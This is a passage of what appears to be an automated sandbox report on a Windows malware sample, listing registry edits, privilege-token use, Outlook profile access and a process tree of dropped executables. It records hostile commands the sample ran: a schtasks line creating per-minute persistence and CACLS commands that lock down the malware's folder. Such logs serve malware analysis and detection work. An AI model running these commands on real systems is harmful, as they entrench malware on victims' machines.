| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3PH93SN.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\FCE2.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\243.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\4C22.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\4C22.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\b98a2ae72314e53a1dc9936278e5d5781688e343d4523b52d7659e7860672f76.exe
"C:\Users\Admin\AppData\Local\Temp\b98a2ae72314e53a1dc9936278e5d5781688e343d4523b52d7659e7860672f76.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\lU8Gt49.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\lU8Gt49.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SG3AY35.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SG3AY35.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\LG7lW98.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\LG7lW98.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ek6NX36.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ek6NX36.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Sr0FS20.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Sr0FS20.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1yK00wd9.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1yK00wd9.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2YI9050.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2YI9050.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3PH93SN.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3PH93SN.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4716 -ip 4716
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 540
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4dS034DX.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4dS034DX.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5mC4Wl2.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5mC4Wl2.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6zu5RF0.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6zu5RF0.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7pK5iC66.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7pK5iC66.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\ADD4.tmp\ADD5.tmp\ADD6.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7pK5iC66.exe"
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x124,0x170,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x140,0x104,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,7100226488549161167,7149096524213436967,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
